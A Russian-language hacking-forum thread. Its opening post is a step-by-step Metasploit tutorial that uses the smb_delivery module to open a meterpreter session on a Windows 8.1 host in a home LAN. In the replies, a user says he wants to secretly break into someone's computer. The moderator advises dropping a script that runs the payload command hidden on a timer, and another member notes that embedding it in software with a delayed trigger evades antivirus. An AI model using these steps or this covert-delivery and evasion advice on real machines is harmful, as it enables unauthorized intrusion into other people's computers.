Взлом удаленного хоста (SMB Delivery Exploit)

Тема в разделе "Этичный хакинг и тестирование на проникновение", создана пользователем Vander, 1 ноя 2016.

Наш партнер Genesis Hackspace
  1. Vander

    Vander Супер-модератор
    Команда форума Grey Team

    Регистрация:
    16 янв 2016
    Сообщения:
    671
    Симпатии:
    1.140
    Всем привет! В этой небольшой статье я хочу показать очередной способ получения сессии meterpreter посредством использования Metasploit Framework, а в частности эксплоита, который носит название SMB Delivery Exploit.

    Взлом удаленного хоста (SMB Delivery Exploit)

    В роли атакующей системы Kali Linux 2016.2 с адресом в локальной сети 192.168.0.102 и целевой хост – Windows 8.1. с адресом в локальной сети 192.168.0.103.

    Откроем терминал и запустим Metasploit Framework:

    > msfconsole

    В консоли фреймворка пишем:

    > use exploit/windows/smb/smb_delivery

    > set srvport 4444

    > set srvhost 192.168.0.102

    > exploit

    Взлом удаленного хоста (SMB Delivery Exploit)

    Теперь, как указывает эксплойт, нам необходимо запустить сгенерированную им команду в командной строке целевого хоста:

    Взлом удаленного хоста (SMB Delivery Exploit)

    После успешной отработки команды в консоли Linux видим формирование сессии meterpreter:

    Взлом удаленного хоста (SMB Delivery Exploit)

    Жмем Ctrl+C, и смотрим информацию о текущих сессиях:

    > sessions –i

    И подключаемся к открытой сессии под номером 1:

    > sessions –I 1

    Взлом удаленного хоста (SMB Delivery Exploit)

    В диспетчере задач Windows созданный процесс выглядит так:

    Взлом удаленного хоста (SMB Delivery Exploit)

    Снимаем задачу и сессия погибает:

    Взлом удаленного хоста (SMB Delivery Exploit)

    На этом собственно все. Спасибо за внимание.
     
    id2746, Toha, gx6060 и 2 другим нравится это.
  2. woweb

    woweb Гость

    Здесь вот што пишет смотрим скин... Взлом удаленного хоста (SMB Delivery Exploit)
     
  3. Vander

    Vander Супер-модератор
    Команда форума Grey Team

    Регистрация:
    16 янв 2016
    Сообщения:
    671
    Симпатии:
    1.140
    Перезагрузи систему, и попробуй другой порт, 4445 к примеру.
     
  4. woweb

    woweb Гость

    Щас попробую...я так изучал debian и самс...сцука не давался ни в какую...в итоге одолел...и щас у меня прокси сервер на debian + sams, кстати а не может быть причина что я сижу в данный момент через прокси, а комп за ее пределами...т.е. у меня айпи 192,168,121,77 а у него 192,168,178,97 ну понятно что точки там...лень было переключать клаву.
     
  5. Vander

    Vander Супер-модератор
    Команда форума Grey Team

    Регистрация:
    16 янв 2016
    Сообщения:
    671
    Симпатии:
    1.140
    Ну и в прокси файрволл, все дела... да? Закрытые порты наверное, кроме используемых...
     
  6. woweb

    woweb Гость

    Что то не пойму вот это выражение "Теперь, как указывает эксплойт, нам необходимо запустить сгенерированную им команду в командной строке целевого хоста:"
    То есть мне теперь нужно сесть за комп который я хочу тайно взломать чтоб запустить в строке команду...
    Ну ё-моё, нахрена мне тогда вообща эти мануалы...елси можно подойти и физически все повредить...к примеру толстой проволокой (лом её еще называют)...пару раз стукнуть и все дела...
    После двух перезагрузок вот что пишет в скрине... Взлом удаленного хоста (SMB Delivery Exploit)
    Поначалу просто долго висела потом я решил проверить ссесию...а ее нет
     
  7. woweb

    woweb Гость

    Ну я ничего не закрывал...если по умолчанию то да...щас попробую минуя прокси...перезагружусь за пределами экрана дфл
     
  8. Vander

    Vander Супер-модератор
    Команда форума Grey Team

    Регистрация:
    16 янв 2016
    Сообщения:
    671
    Симпатии:
    1.140
    Ну напиши программу, какую нить и иль скрипт, скинь на комп поставь время ее запуска, и чтобы она запустила скрытно эту команду в cmd. Нет, блин, такой программы, вломать все, с одноименной кнопкой по центру.
     
  9. woweb

    woweb Гость

    Накуя мне скидывать на комп что-то, подходить к нему...цель вообще не прикасаяс ко компу залезть в него
     
  10. woweb

    woweb Гость

    В общем этот вариант вообще беспонтовый, если тот мануал с кучей команд не работает плсю там задействованы все апи и атакующий и атакуемый...здесь только мы знаем что есть айпи атакуемого...но нигде никуда его не пихаем...то есть стоит в сторонке себе...а мы мозги делаем на своей машине...бля...как можно сломать другую машину копаясь только в своей...ведь по мануалу другой машины вообще в помине нет...только в начале сказано что якобы собирается акаковать что то с айпи таким то...и у все...все остальное происходит на своей машине ни касаясь чего либо другого...
    лядно всем удачи...как я понял тут разводилово...
    ну не может в три секунды сломаться комп...который даже на атаковался...
     
  11. Vander

    Vander Супер-модератор
    Команда форума Grey Team

    Регистрация:
    16 янв 2016
    Сообщения:
    671
    Симпатии:
    1.140
    Взлом удаленного хоста (SMB Delivery Exploit)
     
    Mixa, KeyVoN и paragon21 нравится это.
  12. avacs

    avacs New Member

    Регистрация:
    2 ноя 2016
    Сообщения:
    4
    Симпатии:
    5
  13. avacs

    avacs New Member

    Регистрация:
    2 ноя 2016
    Сообщения:
    4
    Симпатии:
    5
    Vander, благодарим за Ваш Труд и Терпение! Взлом удаленного хоста (SMB Delivery Exploit)
     
    Mixa, Scan и Vander нравится это.
  14. Vander

    Vander Супер-модератор
    Команда форума Grey Team

    Регистрация:
    16 янв 2016
    Сообщения:
    671
    Симпатии:
    1.140
    Scan нравится это.
  15. kot-gor

    kot-gor Well-Known Member
    Команда форума Grey Team

    Регистрация:
    7 сен 2016
    Сообщения:
    206
    Симпатии:
    141
    Всем привет.народ если вы ждете программу в которой тыкнул на кнопочку и вы зашли в чужой комп ..то смею вас разочаровать.Здесь обсуждают инструменты пентестинга,люди делятся своим опытом и знаниями в этой области,а вам подавай готовое решения из коробки..Иногда нужно включать голову,что бы применить тот или иной инструмент или связку их.Учите языки программирования ,данный метод легко встраивается в программное обеспечение, а если поставить таймер на сработку, то это усложнит обнаружения многими антивирусами. Vander статья зачетная!!!!
     
    woweb, cepgio и Vander нравится это.
  16. Vander

    Vander Супер-модератор
    Команда форума Grey Team

    Регистрация:
    16 янв 2016
    Сообщения:
    671
    Симпатии:
    1.140
    Да, обмен опытом - это наш главный приоритет. Отзыв очень исчерпывающий, добавить нечего, все так и есть. Спасибо!
     
  17. Enima

    Enima New Member

    Регистрация:
    29 сен 2016
    Сообщения:
    4
    Симпатии:
    4
    Зачет! проверил все работает!
     
  18. Enima

    Enima New Member

    Регистрация:
    29 сен 2016
    Сообщения:
    4
    Симпатии:
    4
    Мда.... товарищь вам наверное лучше набрать в яндексе "Программы для хакера" вот там как раз полно выдаст отличных программ с кнопкой "ВЗЛОМ" =) еще кстати есть сайты с кнопочкой ЗАРАБАТЫВАТЬ ДЕНЬГИ! и прям счетчик крутится с бабками))) рекомендую!
     
    Stavnik, kot-gor и Vander нравится это.
  19. Vander

    Vander Супер-модератор
    Команда форума Grey Team

    Регистрация:
    16 янв 2016
    Сообщения:
    671
    Симпатии:
    1.140
    :D
     
  20. woweb

    woweb Гость

    Совет самый дешевый товар в мире...тем более у тебя я его и не спрашивал...так что воспользуйстя своим сокровенным знанием заработывать копейки сам...
    А так всем кто адекватно ответил благодарен...
    kot-gor (у) тебе жму руку...если есть возможность поделиться инфой или какой книгой буду признателен!
     
Загрузка...

Поделиться этой страницей